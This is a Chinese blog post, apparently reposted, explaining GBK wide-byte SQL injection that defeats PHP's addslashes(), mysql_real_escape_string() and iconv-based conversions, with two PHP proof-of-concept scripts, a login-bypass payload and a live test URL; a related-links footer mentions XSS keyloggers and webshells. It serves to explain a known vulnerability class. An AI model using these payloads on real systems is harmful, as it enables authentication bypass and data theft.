其实这东西国内少数黑客早已知道,只不过没有共享公布而已。有些人是不愿共享,宁愿烂在地里,另外的一些则是用来牟利。

该漏洞最早2006年被国外用来讨论数据库字符集设为GBK时,0xbf27本身不是一个有效的GBK字符,但经过 addslashes() 转换后变为0xbf5c27,前面的0xbf5c是个有

效的GBK字符,所以0xbf5c27会被当作一个字符0xbf5c和一个单引号来处理,结果漏洞就触发了。

mysql_real_escape_string() 也存在相同的问题,只不过相比 addslashes() 它考虑到了用什么字符集来处理,因此可以用相

应的字符集来处理字符。在MySQL 中有两种改变默认字符集的方法。

方法一:

修改mysql配置文件my.cnf

[client]

default-character-set=GBK

方法二:

在建立连接时使用:SET CHARACTER SET 'GBK'

例:mysql_query("SET CHARACTER SET 'gbk'", $c);

问题是方法二在改变字符集时mysql_real_escape_string() 并不知道而使用默认字符集处理从而造成和 addslashes() 一样的漏洞

下面是来自http://ilia.ws/archives/103-mysql_real_escape_string-versus-Prepared-Statements.html的测试代码

  1. <?php
  2. $c = mysql_connect("localhost", "user", "pass");
  3. mysql_select_db("database", $c);
  4. // change our character set
  5. mysql_query("SET CHARACTER SET 'gbk'", $c);
  6. // create demo table
  7. mysql_query("CREATE TABLE users (
  8. username VARCHAR(32) PRIMARY KEY,
  9. password VARCHAR(32)
  10. ) CHARACTER SET 'GBK'", $c);
  11. mysql_query("INSERT INTO users VALUES('foo','bar'), ('baz','test')", $c);
  12. // now the exploit code
  13. $_POST['username'] = chr(0xbf) . chr(0x27) . ' OR username = username /*';
  14. $_POST['password'] = 'anything';
  15. // Proper escaping, we should be safe, right?
  16. $user = mysql_real_escape_string($_POST['username'], $c);
  17. $passwd = mysql_real_escape_string($_POST['password'], $c);
  18. $sql = "SELECT * FROM users WHERE username = '{$user}' AND password = '{$passwd}'";
  19. $res = mysql_query($sql, $c);
  20. echo mysql_num_rows($res); // will print 2, indicating that we were able to fetch all records
  21. ?>

纵观以上两种触发漏洞的关键是addslashes() 在Mysql配置为GBK时就可以触发漏洞,而mysql_real_escape_string() 是在不知

道字符集的情况下用默认字符集处理产生漏洞的。

下面再来分析下国内最近漏洞产生的原因。

问题出现在一些字符转换函数上,例如mb_convert_encoding()和iconv()等。

发布在80sec上的说明说0xc127等一些字符再被addslashes() 处理成0xc15c27后,又经过一些字符转换函数变为0×808027,而使得经过

addslashes() 加上的"\"失效,这样单引号就又发挥作用了。这就造成了字符注入漏洞。

根据80sec的说明,iconv()没有该问题,但经我用0xbf27测试

  1. $id1=mb_convert_encoding($_GET['id'], 'utf-8', 'gbk');
  2. $id2=iconv('gbk//IGNORE', 'utf-8', $_GET['id']);
  3. $id3=iconv('gbk', 'utf-8', $_GET['id']);

这些在GPC开启的情况下还是会产生字符注入漏洞,测试代码如下:

  1. <?php
  2. $c = mysql_connect("localhost", "user", "pass");
  3. mysql_select_db("database", $c);
  4. // change our character set
  5. mysql_query("SET CHARACTER SET 'gbk'", $c);
  6. // create demo table
  7. mysql_query("CREATE TABLE users (
  8. username VARCHAR(32) PRIMARY KEY,
  9. password VARCHAR(32)
  10. ) CHARACTER SET 'GBK'", $c);
  11. mysql_query("INSERT INTO users VALUES('foo','bar'), ('baz','test')", $c);
  12.  
  13. // now the exploit code
  14. //$id1=mb_convert_encoding($_GET['id'], 'utf-8', 'gbk');
  15. $id2=iconv('gbk//IGNORE', 'utf-8', $_GET['id']);
  16. //$id3=iconv('gbk', 'utf-8', $_GET['id']);
  17.  
  18. $sql = "SELECT * FROM users WHERE username = '{$id2}' AND password = 'password'";
  19. $res = mysql_query($sql, $c);
  20. echo mysql_num_rows($res); // will print 2, indicating that we were able to fetch all records
  21. ?>

测试情况:http://www.safe3.cn/test.php?id=%bf%27 OR username = username /*

后记,这里不光是%bf,其它许多字符也可以造成同样漏洞,大家可以自己做个测试的查下,这里有zwell文章提到的一个分析

http://hackme.ntobjectives.com/sql_inject/login_addslashes.php 。编码的问题在xss中也有利用价值,详情请看我

早期转载的一篇文章Bypassing script filters with variable-width encodings

转载自:http://www.cnblogs.com/Safe3/archive/2008/08/22/1274095.html

Web渗透:PHP字符编码绕过漏洞总结的更多相关文章

  1. web.xml 设置字符编码

    个人理解  就是为了防止在前端输入的数据到了后台发生乱码 直接复制到web.xml里面就可以使用 亲测 能用!!! <!-- 前端过滤器设置字符编码 --> <filter> ...

  2. 小白日记48:kali渗透测试之Web渗透-XSS(二)-漏洞利用-键盘记录器,xsser

    XSS 原则上:只要XSS漏洞存在,可以编写任何功能的js脚本 [反射型漏洞利用] 键盘记录器:被记录下的数据会发送到攻击者指定的URL地址上 服务器:kali 客户端 启动apache2服务:ser ...

  3. web渗透测试(上传漏洞)

    一句话木马—— 一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中扮演着强大的作用. 黑客在注册信息的电子邮箱或者个人主页等插入类似如下代码: <%execute request(“val ...

  4. 2. Web渗透测试中常见逻辑漏洞解析与实战

    注:以下漏洞示例已由相关厂商修复,切勿非法测试! 0x01 漏洞挖掘 01  注册 注册中最常见的有两个,一个是恶意注册,另一个是账户遍历.一个好的注册界面应该是这样 或者这样的 而不是这样的 要么使 ...

  5. web渗透学习目录

    一,基础学习 01.基础学习 [[编码总结]] [[JSON三种数据解析方法]] [[js加密,解密]] [[Internet保留地址和非保留地址.内网和公网.VNC和UltraVN]] 代理 [[S ...

  6. Web渗透测试(xss漏洞)

    Xss介绍—— XSS (cross-site script) 跨站脚本自1996年诞生以来,一直被OWASP(open web application security project) 评为十大安 ...

  7. Web渗透测试漏洞手册及修复建议

    Web渗透测试漏洞手册及修复建议 0x0 配置管理 0x01 HTTP方法测试 漏洞介绍: 目标服务器启用了不安全的传输方法,如PUT.DELETE等,这些方法表示可能在服务器上使用了 WebDAV, ...

  8. 转载过来的参考内容---常规36个WEB渗透测试漏洞描述及修复方法----很详细

        常规WEB渗透测试漏洞描述及修复 --转自:http://www.51testing.com/html/92/n-3723692.html (1). Apache样例文件泄漏 漏洞描述 apa ...

  9. 小白日记37:kali渗透测试之Web渗透-手动漏洞挖掘(三)-目录遍历、文件包含

    手动漏洞挖掘 漏洞类型 #Directory traversal 目录遍历[本台机器操作系统上文件进行读取] 使用者可以通过浏览器/URL地址或者参数变量内容,可以读取web根目录[默认为:/var/ ...

随机推荐

  1. MySQL安装与启动

    1.MySQL安装包下载 下载地址:https://dev.mysql.com/downloads/mysql/ 这里我的电脑是WIN764位的,大家根据自己的电脑自己选择要下载的包 2.解压安装 解 ...

  2. HTMLParser和BeautifulSoup使用入门和总结

    1.HTMLParser一般这么用: from html.parser import HTMLParser from urllib import request class MyHtmlParser( ...

  3. CentOS 下用 Nginx 和 uwsgi 部署 flask 项目

    前几天利用flask 写了几个调用salt-api 的接口,需要上线到正式环境,搜了一下 都是 用 nginx + uwsgi 来部署,这里记录下关键的配置项. 1.首先将代码上传到服务器上目录为: ...

  4. Django实现微信消息推送

    一 所需准备条件 微信公众号的分类 微信消息推送 公众号 已认证公众号 服务号 已认证服务号 企业号 基于:微信认证服务号 主动推送微信消息.前提:关注服务号环境:沙箱环境 沙箱环境地址: https ...

  5. Hadoop格式化namenode 出错 Error: A JNI error has occurred, please check your installation and try again Exception in thread "main" java.lang.NoClassDefFoundError: org/apache/hadoop/security/authorize/Refr

    一般是修改配置文件:etc/hadoop/hadoop-env.sh的时候出现的错误 export JAVA_HOME=/usr/jdk export HADOOP_COMMON_HOME=~/had ...

  6. android开发笔记(3)

    在android环境开发过程中,我最陌生的是虚拟机的创建以及使用,下面是虚拟机的创建以及使用过程. 创建虚拟机: 点击创建虚拟机的按钮,create->填写虚拟机相关的信息,确认之后创建. 创建 ...

  7. SSM框架整合(Spring+SpringMVC+MyBatis+Oracle)

    1.开发环境搭建以及创建Maven Web项目 参看之前的博文[确保maven web项目不报错]:http://www.cnblogs.com/cainiaomahua/p/6306476.html ...

  8. 2019.02.21 bzoj1249: SGU277 HERO 动态凸包(set+凸包)

    传送门 题意:动态插入点,维护凸包面积. 思路:用setsetset维护极角序来支持面积查询即可. 然后注意选原点的时候要从初始三个点随机平均系数来避免精度误差. 代码: #include<bi ...

  9. python模块:configparser

    """Configuration file parser. A configuration file consists of sections, lead by a &q ...

  10. Django用openLDAP做认证

    前言 之前有需求要做一个django+ldap用户管理的简单接口,研究了好几个模块,最后终于能实现django用ldap做用户认证了.也是自己的水平有限吧,做了好长时间,现在就和大家分享一下这个过程吧 ...